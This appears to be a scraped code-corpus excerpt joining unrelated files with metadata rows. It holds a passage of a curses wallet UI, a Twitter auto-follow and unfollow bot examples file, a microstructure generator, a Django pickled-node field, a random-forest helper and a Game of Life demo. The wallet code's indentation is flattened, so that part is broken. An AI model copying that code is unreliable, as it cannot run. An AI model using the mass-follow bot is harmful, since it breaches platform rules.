c, u = self.wallet.get_balance()
msg = _("Balance")+": %f "%(Decimal( c ) / 100000000)
if u: msg += " [%f unconfirmed]"%(Decimal( u ) / 100000000)
else:
msg = _("Not connected")
self.stdscr.addstr( self.maxy -1, 3, msg)
for i in range(self.num_tabs):
self.stdscr.addstr( 0, 2 + 2*i + len(''.join(self.tab_names[0:i])), ' '+self.tab_names[i]+' ', curses.A_BOLD if self.tab == i else 0)
self.stdscr.addstr( self.maxy -1, self.maxx-30, ' '.join([_("Settings"), _("Network"), _("Quit")]))
def print_contacts(self):
messages = map(lambda addr: "%30s %30s "%(addr, self.wallet.labels.get(addr,"")), self.wallet.addressbook)
self.print_list(messages, "%19s %25s "%("Address", "Label"))
def print_receive(self):
fmt = "%-35s %-30s"
messages = map(lambda addr: fmt % (addr, self.wallet.labels.get(addr,"")), self.wallet.addresses())
self.print_list(messages, fmt % ("Address", "Label"))
def print_edit_line(self, y, label, text, index, size):
text += " "*(size - len(text) )
self.stdscr.addstr( y, 2, label)
self.stdscr.addstr( y, 15, text, curses.A_REVERSE if self.pos%6==index else curses.color_pair(1))
def print_send_tab(self):
self.stdscr.clear()
self.print_edit_line(3, _("Pay to"), self.str_recipient, 0, 40)
self.print_edit_line(5, _("Description"), self.str_description, 1, 40)
self.print_edit_line(7, _("Amount"), self.str_amount, 2, 15)
self.print_edit_line(9, _("Fee"), self.str_fee, 3, 15)
self.stdscr.addstr( 12, 15, _("[Send]"), curses.A_REVERSE if self.pos%6==4 else curses.color_pair(2))
self.stdscr.addstr( 12, 25, _("[Clear]"), curses.A_REVERSE if self.pos%6==5 else curses.color_pair(2))
def print_banner(self):
if self.network:
self.print_list( self.network.banner.split('\n'))
def print_list(self, list, firstline = None):
self.maxpos = len(list)
if not self.maxpos: return
if firstline:
firstline += " "*(self.maxx -2 - len(firstline))
self.stdscr.addstr( 1, 1, firstline )
for i in range(self.maxy-4):
msg = list[i] if i < len(list) else ""
msg += " "*(self.maxx - 2 - len(msg))
m = msg[0:self.maxx - 2]
m = m.encode(self.encoding)
self.stdscr.addstr( i+2, 1, m, curses.A_REVERSE if i == (self.pos % self.maxpos) else 0)
def refresh(self):
if self.tab == -1: return
self.stdscr.border(0)
self.print_balance()
self.stdscr.refresh()
def main_command(self):
c = self.stdscr.getch()
print c
if c == curses.KEY_RIGHT: self.tab = (self.tab + 1)%self.num_tabs
elif c == curses.KEY_LEFT: self.tab = (self.tab - 1)%self.num_tabs
elif c == curses.KEY_DOWN: self.pos +=1
elif c == curses.KEY_UP: self.pos -= 1
elif c == 9: self.pos +=1 # tab
elif curses.unctrl(c) in ['^W', '^C', '^X', '^Q']: self.tab = -1
elif curses.unctrl(c) in ['^N']: self.network_dialog()
elif curses.unctrl(c) == '^S': self.settings_dialog()
else: return c
if self.pos<0: self.pos=0
if self.pos>=self.maxpos: self.pos=self.maxpos - 1
def run_tab(self, i, print_func, exec_func):
while self.tab == i:
self.stdscr.clear()
print_func()
self.refresh()
c = self.main_command()
if c: exec_func(c)
def run_history_tab(self, c):
if c == 10:
out = self.run_popup('',["blah","foo"])
def edit_str(self, target, c, is_num=False):
# detect backspace
if c in [8, 127, 263] and target:
target = target[:-1]
elif not is_num or curses.unctrl(c) in '0123456789.':
target += curses.unctrl(c)
return target
def run_send_tab(self, c):
if self.pos%6 == 0:
self.str_recipient = self.edit_str(self.str_recipient, c)
if self.pos%6 == 1:
self.str_description = self.edit_str(self.str_description, c)
if self.pos%6 == 2:
self.str_amount = self.edit_str(self.str_amount, c, True)
elif self.pos%6 == 3:
self.str_fee = self.edit_str(self.str_fee, c, True)
elif self.pos%6==4:
if c == 10: self.do_send()
elif self.pos%6==5:
if c == 10: self.do_clear()
def run_receive_tab(self, c):
if c == 10:
out = self.run_popup('Address', ["Edit label", "Freeze", "Prioritize"])
def run_contacts_tab(self, c):
if c == 10 and self.wallet.addressbook:
out = self.run_popup('Address', ["Copy", "Pay to", "Edit label", "Delete"]).get('button')
address = self.wallet.addressbook[self.pos%len(self.wallet.addressbook)]
if out == "Pay to":
self.tab = 1
self.str_recipient = address
self.pos = 2
elif out == "Edit label":
s = self.get_string(6 + self.pos, 18)
if s:
self.wallet.labels[address] = s
def run_banner_tab(self, c):
self.show_message(repr(c))
pass
def main(self,url):
tty.setraw(sys.stdin)
while self.tab != -1:
self.run_tab(0, self.print_history, self.run_history_tab)
self.run_tab(1, self.print_send_tab, self.run_send_tab)
self.run_tab(2, self.print_receive, self.run_receive_tab)
self.run_tab(3, self.print_contacts, self.run_contacts_tab)
self.run_tab(4, self.print_banner, self.run_banner_tab)
tty.setcbreak(sys.stdin)
curses.nocbreak()
self.stdscr.keypad(0)
curses.echo()
curses.endwin()
def do_clear(self):
self.str_amount = ''
self.str_recipient = ''
self.str_fee = ''
self.str_description = ''
def do_send(self):
if not is_valid(self.str_recipient):
self.show_message(_('Invalid devcoin address'))
return
try:
amount = int( Decimal( self.str_amount) * 100000000 )
except Exception:
self.show_message(_('Invalid Amount'))
return
try:
fee = int( Decimal( self.str_fee) * 100000000 )
except Exception:
self.show_message(_('Invalid Fee'))
return
if self.wallet.use_encryption:
password = self.password_dialog()
if not password:
return
else:
password = None
try:
tx = self.wallet.mktx( [(self.str_recipient, amount)], password, fee)
except Exception as e:
self.show_message(str(e))
return
if self.str_description:
self.wallet.labels[tx.hash()] = self.str_description
h = self.wallet.send_tx(tx)
self.show_message(_("Please wait..."), getchar=False)
self.wallet.tx_event.wait()
status, msg = self.wallet.receive_tx( h, tx )
if status:
self.show_message(_('Payment sent.'))
self.do_clear()
#self.update_contacts_tab()
else:
self.show_message(_('Error'))
def show_message(self, message, getchar = True):
w = self.w
w.clear()
w.border(0)
for i, line in enumerate(message.split('\n')):
w.addstr(2+i,2,line)
w.refresh()
if getchar: c = self.stdscr.getch()
def run_popup(self, title, items):
return self.run_dialog(title, map(lambda x: {'type':'button','label':x}, items), interval=1, y_pos = self.pos+3)
def network_dialog(self):
if not self.network: return
auto_connect = self.network.config.get('auto_cycle')
host, port, protocol = self.network.default_server.split(':')
srv = 'auto-connect' if auto_connect else self.network.default_server
out = self.run_dialog('Network', [
{'label':'server', 'type':'str', 'value':srv},
{'label':'proxy', 'type':'str', 'value':self.config.get('proxy', '')},
], buttons = 1)
if out:
if out.get('server'):
server = out.get('server')
auto_connect = server == 'auto-connect'
if not auto_connect:
try:
host, port, protocol = server.split(':')
except Exception:
self.show_message("Error:" + server + "\nIn doubt, type \"auto-connect\"")
return False
if out.get('proxy'):
proxy = self.parse_proxy_options(out.get('proxy'))
else:
proxy = None
self.network.set_parameters(host, port, protocol, proxy, auto_connect)
def settings_dialog(self):
out = self.run_dialog('Settings', [
{'label':'Default GUI', 'type':'list', 'choices':['classic','lite','gtk','text'], 'value':self.config.get('gui')},
{'label':'Default fee', 'type':'satoshis', 'value': format_satoshis(self.wallet.fee).strip() }
], buttons = 1)
if out:
if out.get('Default GUI'):
self.config.set_key('gui', out['Default GUI'], True)
if out.get('Default fee'):
fee = int ( Decimal( out['Default fee']) *100000000 )
self.config.set_key('fee_per_kb', fee, True)
def password_dialog(self):
out = self.run_dialog('Password', [
{'label':'Password', 'type':'password', 'value':''}
], buttons = 1)
return out.get('Password')
def run_dialog(self, title, items, interval=2, buttons=None, y_pos=3):
self.popup_pos = 0
self.w = curses.newwin( 5 + len(items)*interval + (2 if buttons else 0), 50, y_pos, 5)
w = self.w
out = {}
while True:
w.clear()
w.border(0)
w.addstr( 0, 2, title)
num = len(items)
numpos = num
if buttons: numpos += 2
for i in range(num):
item = items[i]
label = item.get('label')
if item.get('type') == 'list':
value = item.get('value','')
elif item.get('type') == 'satoshis':
value = item.get('value','')
elif item.get('type') == 'str':
value = item.get('value','')
elif item.get('type') == 'password':
value = '*'*len(item.get('value',''))
else:
value = ''
if len(value)<20: value += ' '*(20-len(value))
if item.has_key('value'):
w.addstr( 2+interval*i, 2, label)
w.addstr( 2+interval*i, 15, value, curses.A_REVERSE if self.popup_pos%numpos==i else curses.color_pair(1) )
else:
w.addstr( 2+interval*i, 2, label, curses.A_REVERSE if self.popup_pos%numpos==i else 0)
if buttons:
w.addstr( 5+interval*i, 10, "[ ok ]", curses.A_REVERSE if self.popup_pos%numpos==(numpos-2) else curses.color_pair(2))
w.addstr( 5+interval*i, 25, "[cancel]", curses.A_REVERSE if self.popup_pos%numpos==(numpos-1) else curses.color_pair(2))
w.refresh()
c = self.stdscr.getch()
if c in [ord('q'), 27]: break
elif c in [curses.KEY_LEFT, curses.KEY_UP]: self.popup_pos -= 1
elif c in [curses.KEY_RIGHT, curses.KEY_DOWN]: self.popup_pos +=1
else:
i = self.popup_pos%numpos
if buttons and c==10:
if i == numpos-2:
return out
elif i == numpos -1:
return {}
item = items[i]
_type = item.get('type')
if _type == 'str':
item['value'] = self.edit_str(item['value'], c)
out[item.get('label')] = item.get('value')
elif _type == 'password':
item['value'] = self.edit_str(item['value'], c)
out[item.get('label')] = item ['value']
elif _type == 'satoshis':
item['value'] = self.edit_str(item['value'], c, True)
out[item.get('label')] = item.get('value')
elif _type == 'list':
choices = item.get('choices')
try:
j = choices.index(item.get('value'))
except Exception:
j = 0
new_choice = choices[(j + 1)% len(choices)]
item['value'] = new_choice
out[item.get('label')] = item.get('value')
elif _type == 'button':
out['button'] = item.get('label')
break
return out
| gpl-3.0 | -9,012,374,220,583,325,000 | 35.174274 | 151 | 0.50889 | false |
ac769/continuum_technologies | twitter/sample_twitter_codes.py | 1 | 1644 | '''
In this file we have a bunch of examples you can use at your own discretion.
To run an example, uncomment its code lines (remove the leading # marks; for
example #4, remove the three ' marks above and below it instead) while leaving
the descriptive text commented out.
Once that's done, go to your Terminal, navigate to where this file and the twitter_follow_bot
code are (they have to be in the same folder), and type in "python sample_twitter_codes.py" (without quotes).
WARNING: Following too many people, favoriting too many things, CAN and WILL get you banned.
Be smart. And have fun :).
Justin and Nat
'''
'''
#1 Here you can automatically follow people who tweet about a certain phrase. Just replace the phrase
with something relevant to you! Also you can set the count to whatever makes you most comfortable.
'''
#from twitter_follow_bot import auto_follow
#auto_follow("sharing economy 2.0", count=100)
'''
#2 In this code, change "@InnoCentive" to the twitter handle whose followers you want to follow,
and set the count to how many people should be followed. Default is 100.
'''
#from twitter_follow_bot import auto_follow_followers_for_user
#auto_follow_followers_for_user("@InnoCentive", count=100)
'''
#3 This code will let you favorite things that are relevant to you. Just replace the phrase with the one
you want to favorite, and set the count to how many things you want to favorite.
'''
#from twitter_follow_bot import auto_fav
#auto_fav("#openinnovation", count=100)
'''
#4 This code will automatically un-follow everyone who hasn't followed you back.
from twitter_follow_bot import auto_unfollow_nonfollowers
auto_unfollow_nonfollowers()
'''
| mit | 906,195,234,186,292,000 | 33.534091 | 99 | 0.756083 | false |
Micket/CCBuilder | make_cc.py | 1 | 8680 | #!/usr/bin/env python3
from __future__ import print_function
from __future__ import division
import argparse
import pickle
import time
import CCBuilder as ccb
import CCBuilder_c as ccb_c
import numpy as np
import scipy.special
def uniform_dist(x):
""" Returns uniform distributions of given range """
return lambda: np.random.uniform(x[0], x[1])
def weibull_dist(a, mu):
""" Returns Weibull distributions for given shape parameter and average """
return lambda: np.random.weibull(a) * mu / scipy.special.gamma(1/a + 1)
def parse_dist(arg):
# Parses input string for given distribution.
# Returns a distribution, and the average
d, params = arg.split(':')
params = [float(x) for x in params.split(',')]
if d == 'U':
return uniform_dist(params), np.mean(params)
elif d == 'W':
a, mu = params
return weibull_dist(a, mu), mu
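# Illustrative examples of the distribution strings handled above (the values
# are arbitrary): parse_dist('W:1.2,0.8') returns a Weibull sampler with shape
# a=1.2 rescaled to mean 0.8, together with that mean; parse_dist('U:0.5,1.5')
# returns a uniform sampler on [0.5, 1.5] together with its mean 1.0.
#
#     d_eq, d_0 = parse_dist('W:1.2,0.8')
#     sample = d_eq()  # one random equivalent diameter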
parser = argparse.ArgumentParser(description='''Generate a WC microstructure.
Grain shape/size supports 2 types of distributions:
Uniform: U:low,high
Weibull: W:a,mu (a=k in some notation, mu=mean)
''',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
# parser.add_argument('-V', dest='verbose', action='store_true', help='Verbose mode.')
parser.add_argument('-f', dest='fname', metavar='basename', required=True, help='Output base filename.')
parser.add_argument('-L', dest='L', metavar='length', required=True, type=float, help='Cell length (volume is L^3)')
parser.add_argument('-m', dest='m', metavar='m', required=True, type=int,
help='Grid resolution. Total number of voxels are (m*L)^3')
parser.add_argument('--vol_frac_goal', dest="vol_frac_goal", metavar='v', required=True, type=float,
help='Goal for volume fraction WC (excluding overlap)')
parser.add_argument('-s', dest='seed', metavar='s', default=None, type=int,
help='Seed for RNG. Given identical parameters, ' +
'CCBuilder will generate identical output given a controlled seed.')
parser.add_argument('--stray_cleanup', action='store_true', help='Clean up stray voxels')
group = parser.add_argument_group('WC grain shape')
group.add_argument('-k', dest='k_dist', metavar='type,[params]', default='U:0.4,1.4',
help='k distribution')
group.add_argument('-r', dest='r_dist', metavar='type,[params]', default='U:0.1,0.4',
help='r distribution')
group.add_argument('-d', dest='d_dist', metavar='type,[params]', default='U:0.5,1.5',
help='d distribution')
group = parser.add_argument_group('Packing')
group.add_argument('--use_potential', action='store_true', help='Use repulsive potential.')
group.add_argument('--nr_tries', dest='nr_tries', metavar='n', default=2500, type=int,
help='Number of random translations.')
group.add_argument('--delta', dest='delta', metavar='d', type=float,
help='Maximum distance for randomized translations.')
group.add_argument('--m_coarse', dest="m_coarse", metavar='mc', default=10,
help='Grid resolution during packing.')
group = parser.add_argument_group('Potts simulation')
group.add_argument('--mc_steps', dest="mc_steps", metavar='steps', default=0.05, type=float,
help='Monte-Carlo steps (scales with (m*L)^4. Set to zero to turn off.')
group.add_argument('--tau', dest='tau', metavar='t', default=0.5, type=float,
help='Ficticious temperature in Potts model.')
options = parser.parse_args()
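# Example invocation (illustrative values only; flags as defined above):
#   python make_cc.py -f wc_co -L 5.0 -m 20 --vol_frac_goal 0.75 \
#       -d W:3.0,0.8 -r U:0.1,0.4 -k U:0.4,1.4 --mc_steps 0.05 -s 42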
if options.seed is not None:
np.random.seed(options.seed)
# Heuristic mapping from actual to goal volume fraction
# vol_frac_goal = (alpha - 2)/(2 * alpha) + 1/alpha * np.sqrt(1 - alpha * np.log(-2*(vol_frac - 1)))
d_eq, d_0 = parse_dist(options.d_dist)
r, r_0 = parse_dist(options.r_dist)
k, k_0 = parse_dist(options.k_dist)
fname = options.fname
# to avoid confusion with types:
m = np.int(options.m)
m_coarse = np.int(options.m_coarse)
L = np.float(options.L)
mc_steps = np.float(options.mc_steps)
vol_frac_goal = np.double(options.vol_frac_goal)
tau = np.double(options.tau)
nr_tries = np.int(options.nr_tries)
delta_x = d_0/float(m)
M = np.int(m * L / d_0)
M_coarse = np.int(m_coarse * L / d_0)
idelta = M
idelta_coarse = M_coarse
if options.delta:
idelta = np.int(M * options.delta / L)
idelta_coarse = np.int(M_coarse * options.delta / L)
trunc_triangles = ccb.prepare_triangles(vol_frac_goal, L, r, k, d_eq)
# trunc_triangles = trunc_triangles[:1]
# trunc_triangles[0].rot_matrix = np.eye(3)
# trunc_triangles[0].rot_matrix_tr = np.eye(3)
# trunc_triangles[0].midpoint = np.array([2., 2., 2.])
# Sort triangles w.r.t. volume, so that large triangles are added to the box first (better packing)
trunc_triangles.sort(key=lambda x: x.volume, reverse=True)
print('Prepared', len(trunc_triangles), 'triangles')
if options.use_potential:
ccb.optimize_midpoints(L, trunc_triangles)
if m_coarse == m:
grain_ids, overlaps, voxel_indices = ccb_c.populate_voxels(M, L, trunc_triangles, nr_tries, idelta, 1.0)
else:
if nr_tries > 0:
# Optimization: Use coarser grid for packing, then insert packed grains into fine grid
# No need to get the return values, trunc_triangles
ccb_c.populate_voxels(M_coarse, L, trunc_triangles, nr_tries, idelta_coarse, 1.0)
grain_ids, overlaps, voxel_indices = ccb_c.populate_voxels(M, L, trunc_triangles, 1, 0, 1.0)
if mc_steps > 0:
start_time = time.time()
# Do Potts on coarse grid first for an improved initial guess.
M_coarseMC = M//2
grain_ids_coarse, overlaps_coarse, voxel_indices_coarse = ccb_c.populate_voxels(M_coarseMC, L, trunc_triangles, 0, 0, 1.0)
_, gb_voxels_coarse, _ = ccb_c.calc_surface_prop(M_coarseMC, grain_ids_coarse)
ccb_c.make_mcp_bound(M_coarseMC, grain_ids_coarse, gb_voxels_coarse, overlaps_coarse, voxel_indices_coarse,
np.int(mc_steps * M_coarseMC**4), tau)
# Copy over that solution to the overlap regions of the fine grid as a starting point
M2 = M**2
i = np.nonzero(overlaps)[0]
iz = i // M2
iy = (i - iz*M2) // M
ix = i - iz*M2 - iy*M
cix = ix * M_coarseMC // M
ciy = iy * M_coarseMC // M
ciz = iz * M_coarseMC // M
ci = cix + ciy*M_coarseMC + ciz*M_coarseMC**2
gid = grain_ids_coarse[ci]
# Could use a Cython implementation for efficiency.
for ii, g in zip(i, gid):
if g != grain_ids[ii] and np.searchsorted(voxel_indices[g-2], ii) < len(voxel_indices[g-2]):
grain_ids[ii] = g
# This might change a few voxels to a value that they shouldn't obtain, but it's barely noticeable
# grain_ids_1[i] = grain_ids_coarse[ci]
_, gb_voxels, _ = ccb_c.calc_surface_prop(M, grain_ids)
# and run the full resolution MCP:
ccb_c.make_mcp_bound(M, grain_ids, gb_voxels, overlaps, voxel_indices, np.int(mc_steps * M ** 4), tau)
print('Potts model took {} seconds'.format(np.str(time.time() - start_time)))
if options.stray_cleanup:
start_time = time.time()
ccb_c.stray_cleanup(M, grain_ids)
print('Stray voxel cleanup took {} seconds'.format(np.str(time.time() - start_time)))
surface_voxels, gb_voxels, interface_voxels = ccb_c.calc_surface_prop(M, grain_ids)
phases, good_voxels, euler_angles = ccb_c.calc_grain_prop(M, grain_ids, trunc_triangles)
phase_volumes = np.bincount(phases)
vol_frac_WC = phase_volumes[2] / np.float(M ** 3)
vol_frac_Co = 1 - vol_frac_WC
mass_frac_WC = ccb.mass_fraction(vol_frac_WC)
sum_gb_voxels = np.sum(gb_voxels)
contiguity = sum_gb_voxels / np.float(sum_gb_voxels + np.sum(interface_voxels))
print('Contiguity {:5f}, Co volume frac {:.5f}, mass frac {:.5f}'.format(
contiguity, 1 - vol_frac_WC, ccb.mass_fraction(vol_frac_WC)))
ccb.write_dream3d(fname, 3 * [M], 3 * [delta_x], trunc_triangles, grain_ids, phases, good_voxels,
euler_angles, surface_voxels, gb_voxels, interface_voxels, overlaps)
with open(fname + '_trunc_triangles.data', 'wb') as f:
pickle.dump([t.rot_matrix for t in trunc_triangles], f)
# Saving grain volume data
if False:
grain_volumes = np.bincount(grain_ids)
d_eq = ccb.volume_to_eq_d(grain_volumes[2:] * delta_x ** 3)
# np.savetxt(fname + '_d_orig.txt', [t.d_eq for t in trunc_triangles])
np.savetxt(fname + '_d.txt', d_eq)
# Plot initial and final distributions
import matplotlib.pyplot as plt
plt.hist(np.array([t.d_eq for t in trunc_triangles]), alpha=0.5, bins=15, normed=True, label='Initial')
plt.hist(d_eq, alpha=0.5, bins=15, normed=True, label='Final')
plt.legend(loc='upper right')
plt.show()
| gpl-3.0 | -3,357,573,291,557,032,400 | 41.54902 | 126 | 0.65818 | false |
lyoniionly/django-cobra | src/cobra/models/fields/node.py | 1 | 3306 | from __future__ import absolute_import, print_function
import collections
import logging
import six
import warnings
from django.db import models
from django.db.models.signals import post_delete
from cobra.core.cache import memoize
from cobra.core.compat import pickle
from cobra.core.strings import decompress, compress
from .gzippeddict import GzippedDictField
try:
from south.modelsinspector import add_introspection_rules
except ImportError:
pass
else:
add_introspection_rules([], ["^cobra\.models\.fields\.node\.NodeField"])
__all__ = ('NodeField',)
logger = logging.getLogger('cobra.errors')
class NodeData(collections.MutableMapping):
def __init__(self, id, data=None):
self.id = id
self._node_data = data
def __getitem__(self, key):
return self.data[key]
def __setitem__(self, key, value):
self.data[key] = value
def __delitem__(self, key):
del self.data[key]
def __iter__(self):
return iter(self.data)
def __len__(self):
return len(self.data)
def __repr__(self):
cls_name = type(self).__name__
if self._node_data:
return '<%s: id=%s data=%r>' % (
cls_name, self.id, repr(self._node_data))
return '<%s: id=%s>' % (cls_name, self.id,)
@memoize
def data(self):
from cobra import singleton
if self._node_data is not None:
return self._node_data
elif self.id:
warnings.warn('You should populate node data before accessing it.')
return singleton.nodestore.get(self.id) or {}
return {}
def bind_data(self, data):
self._node_data = data
class NodeField(GzippedDictField):
"""
Similar to the gzippedictfield except that it stores a reference
to an external node.
"""
def contribute_to_class(self, cls, name):
super(NodeField, self).contribute_to_class(cls, name)
post_delete.connect(
self.on_delete,
sender=self.model,
weak=False)
def on_delete(self, instance, **kwargs):
from cobra import singleton
value = getattr(instance, self.name)
if not value.id:
return
singleton.nodestore.delete(value.id)
def to_python(self, value):
if isinstance(value, six.string_types) and value:
try:
value = pickle.loads(decompress(value))
except Exception as e:
logger.exception(e)
value = {}
elif not value:
value = {}
if 'node_id' in value:
node_id = value.pop('node_id')
data = None
else:
node_id = None
data = value
return NodeData(node_id, data)
def get_prep_value(self, value):
from cobra import singleton
if not value and self.null:
# save ourselves some storage
return None
# TODO(dcramer): we should probably do this more intelligently
# and manually
if not value.id:
value.id = singleton.nodestore.create(value.data)
else:
singleton.nodestore.set(value.id, value.data)
return compress(pickle.dumps({
'node_id': value.id
}))
| apache-2.0 | 8,760,018,005,294,236,000 | 24.635659 | 79 | 0.588627 | false |
andersgs/dingo | dingo/random_forest.py | 1 | 2551 | '''
Some functions to fit a random forest
'''
import sklearn.ensemble
import pandas
import progressbar
bar = progressbar.ProgressBar()
def test_max_features(max_features):
if (max_features not in ['sqrt', 'auto', 'log2', None]):
try:
max_features = int(max_features)
except ValueError:
print("max_features has to be an integer or one of 'sqrt', 'auto', 'log2' or None.")
raise
return max_features
def learn(X,y, n_trees = 10, criterion = 'entropy', max_features = "sqrt", max_depth = None, min_samples_split = 2, min_samples_leaf = 1, min_weight_fraction_leaf = 0, max_leaf_nodes = None, min_impurity_split = 1e-7, bootstrap = False, oob_score = False, n_jobs = 10, random_state = None, warm_start = False, class_weight = 'balanced_subsample'):
rf = sklearn.ensemble.RandomForestClassifier(n_estimators = n_trees, \
criterion = criterion, \
max_features = max_features, \
max_depth = max_depth, \
min_samples_split = min_samples_split, \
min_samples_leaf = min_samples_leaf, \
min_weight_fraction_leaf = min_weight_fraction_leaf, \
max_leaf_nodes = max_leaf_nodes, \
min_impurity_split = min_impurity_split, \
bootstrap = bootstrap, \
oob_score = oob_score, \
n_jobs = n_jobs, \
random_state = random_state, \
warm_start = warm_start, \
class_weight = class_weight, \
verbose = 1
)
rf.fit(X, y)
return rf
def importance(rf, kmers):
importance = rf.estimators_[0].feature_importances_
for est in bar(rf.estimators_[1:]):
importance += est.feature_importances_
importance = importance/rf.n_estimators
d = {"kmer": kmers,
"importance": importance}
d = pandas.DataFrame(d)
d = d.sort_values(by = "importance", ascending = 0)
d = d.loc[d.importance > 0]
return d
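# Illustrative usage of the two helpers above (X, y and kmers are assumed to be
# a feature matrix, class labels and the matching kmer names):
#     rf = learn(X, y, n_trees=500, n_jobs=4)
#     top_kmers = importance(rf, kmers)  # kmers ranked by mean importance, zeros dropped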
| bsd-3-clause | -2,556,278,225,202,661,400 | 49.019608 | 347 | 0.46374 | false |
Orav/kbengine | kbe/src/lib/python/Tools/demo/life.py | 1 | 9249 | #!/usr/bin/env python3
"""
A curses-based version of Conway's Game of Life.
An empty board will be displayed, and the following commands are available:
E : Erase the board
R : Fill the board randomly
S : Step for a single generation
C : Update continuously until a key is struck
Q : Quit
Cursor keys : Move the cursor around the board
Space or Enter : Toggle the contents of the cursor's position
Contributed by Andrew Kuchling, Mouse support and color by Dafydd Crosby.
"""
import curses
import random
class LifeBoard:
"""Encapsulates a Life board
Attributes:
X,Y : horizontal and vertical size of the board
state : dictionary mapping (x,y) to 0 or 1
Methods:
display(update_board) -- If update_board is true, compute the
next generation. Then display the state
of the board and refresh the screen.
erase() -- clear the entire board
make_random() -- fill the board randomly
set(y,x) -- set the given cell to Live; doesn't refresh the screen
toggle(y,x) -- change the given cell from live to dead, or vice
versa, and refresh the screen display
"""
def __init__(self, scr, char=ord('*')):
"""Create a new LifeBoard instance.
scr -- curses screen object to use for display
char -- character used to render live cells (default: '*')
"""
self.state = {}
self.scr = scr
Y, X = self.scr.getmaxyx()
self.X, self.Y = X - 2, Y - 2 - 1
self.char = char
self.scr.clear()
# Draw a border around the board
border_line = '+' + (self.X * '-') + '+'
self.scr.addstr(0, 0, border_line)
self.scr.addstr(self.Y + 1, 0, border_line)
for y in range(0, self.Y):
self.scr.addstr(1 + y, 0, '|')
self.scr.addstr(1 + y, self.X + 1, '|')
self.scr.refresh()
def set(self, y, x):
"""Set a cell to the live state"""
if x < 0 or self.X <= x or y < 0 or self.Y <= y:
raise ValueError("Coordinates out of range %i,%i" % (y, x))
self.state[x, y] = 1
def toggle(self, y, x):
"""Toggle a cell's state between live and dead"""
if x < 0 or self.X <= x or y < 0 or self.Y <= y:
raise ValueError("Coordinates out of range %i,%i" % (y, x))
if (x, y) in self.state:
del self.state[x, y]
self.scr.addch(y + 1, x + 1, ' ')
else:
self.state[x, y] = 1
if curses.has_colors():
# Let's pick a random color!
self.scr.attrset(curses.color_pair(random.randrange(1, 7)))
self.scr.addch(y + 1, x + 1, self.char)
self.scr.attrset(0)
self.scr.refresh()
def erase(self):
"""Clear the entire board and update the board display"""
self.state = {}
self.display(update_board=False)
def display(self, update_board=True):
"""Display the whole board, optionally computing one generation"""
M, N = self.X, self.Y
if not update_board:
for i in range(0, M):
for j in range(0, N):
if (i, j) in self.state:
self.scr.addch(j + 1, i + 1, self.char)
else:
self.scr.addch(j + 1, i + 1, ' ')
self.scr.refresh()
return
d = {}
self.boring = 1
for i in range(0, M):
L = range(max(0, i - 1), min(M, i + 2))
for j in range(0, N):
s = 0
live = (i, j) in self.state
for k in range(max(0, j - 1), min(N, j + 2)):
for l in L:
if (l, k) in self.state:
s += 1
s -= live
if s == 3:
# Birth
d[i, j] = 1
if curses.has_colors():
# Let's pick a random color!
self.scr.attrset(curses.color_pair(
random.randrange(1, 7)))
self.scr.addch(j + 1, i + 1, self.char)
self.scr.attrset(0)
if not live:
self.boring = 0
elif s == 2 and live:
# Survival
d[i, j] = 1
elif live:
# Death
self.scr.addch(j + 1, i + 1, ' ')
self.boring = 0
self.state = d
self.scr.refresh()
def make_random(self):
"Fill the board with a random pattern"
self.state = {}
for i in range(0, self.X):
for j in range(0, self.Y):
if random.random() > 0.5:
self.set(j, i)
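# --- Illustrative usage sketch (not part of the original demo) --------------
# A hedged, minimal way to drive LifeBoard without the interactive key loop,
# assuming it is invoked under curses.wrapper() just like keyloop() below,
# e.g. curses.wrapper(_demo_lifeboard).
def _demo_lifeboard(stdscr, generations=10):
    """Fill a board randomly and advance it a few generations."""
    height, width = stdscr.getmaxyx()
    win = stdscr.subwin(height - 3, width, 0, 0)
    board = LifeBoard(win, char=ord('*'))
    board.make_random()
    board.display(update_board=False)
    for _ in range(generations):
        board.display()      # compute and draw the next generation
        curses.napms(100)    # brief pause so the evolution is visible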
def erase_menu(stdscr, menu_y):
"Clear the space where the menu resides"
stdscr.move(menu_y, 0)
stdscr.clrtoeol()
stdscr.move(menu_y + 1, 0)
stdscr.clrtoeol()
def display_menu(stdscr, menu_y):
"Display the menu of possible keystroke commands"
erase_menu(stdscr, menu_y)
# If color, then light the menu up :-)
if curses.has_colors():
stdscr.attrset(curses.color_pair(1))
stdscr.addstr(menu_y, 4,
'Use the cursor keys to move, and space or Enter to toggle a cell.')
stdscr.addstr(menu_y + 1, 4,
'E)rase the board, R)andom fill, S)tep once or C)ontinuously, Q)uit')
stdscr.attrset(0)
def keyloop(stdscr):
# Clear the screen and display the menu of keys
stdscr.clear()
stdscr_y, stdscr_x = stdscr.getmaxyx()
menu_y = (stdscr_y - 3) - 1
display_menu(stdscr, menu_y)
# If color, then initialize the color pairs
if curses.has_colors():
curses.init_pair(1, curses.COLOR_BLUE, 0)
curses.init_pair(2, curses.COLOR_CYAN, 0)
curses.init_pair(3, curses.COLOR_GREEN, 0)
curses.init_pair(4, curses.COLOR_MAGENTA, 0)
curses.init_pair(5, curses.COLOR_RED, 0)
curses.init_pair(6, curses.COLOR_YELLOW, 0)
curses.init_pair(7, curses.COLOR_WHITE, 0)
# Set up the mask to listen for mouse events
curses.mousemask(curses.BUTTON1_CLICKED)
# Allocate a subwindow for the Life board and create the board object
subwin = stdscr.subwin(stdscr_y - 3, stdscr_x, 0, 0)
board = LifeBoard(subwin, char=ord('*'))
board.display(update_board=False)
# xpos, ypos are the cursor's position
xpos, ypos = board.X // 2, board.Y // 2
# Main loop:
while True:
stdscr.move(1 + ypos, 1 + xpos) # Move the cursor
c = stdscr.getch() # Get a keystroke
if 0 < c < 256:
c = chr(c)
if c in ' \n':
board.toggle(ypos, xpos)
elif c in 'Cc':
erase_menu(stdscr, menu_y)
stdscr.addstr(menu_y, 6, ' Hit any key to stop continuously '
'updating the screen.')
stdscr.refresh()
# Activate nodelay mode; getch() will return -1
# if no keystroke is available, instead of waiting.
stdscr.nodelay(1)
while True:
c = stdscr.getch()
if c != -1:
break
stdscr.addstr(0, 0, '/')
stdscr.refresh()
board.display()
stdscr.addstr(0, 0, '+')
stdscr.refresh()
stdscr.nodelay(0) # Disable nodelay mode
display_menu(stdscr, menu_y)
elif c in 'Ee':
board.erase()
elif c in 'Qq':
break
elif c in 'Rr':
board.make_random()
board.display(update_board=False)
elif c in 'Ss':
board.display()
else:
# Ignore incorrect keys
pass
elif c == curses.KEY_UP and ypos > 0:
ypos -= 1
elif c == curses.KEY_DOWN and ypos + 1 < board.Y:
ypos += 1
elif c == curses.KEY_LEFT and xpos > 0:
xpos -= 1
